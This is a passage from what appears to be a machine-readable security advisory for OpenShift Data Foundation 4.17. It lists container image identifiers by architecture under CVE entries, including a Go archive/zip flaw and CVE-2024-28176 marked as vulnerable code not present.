"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: archive/zip: Incorrect handling of certain ZIP files", }, { cve: "CVE-2024-28176", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-03-10T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", 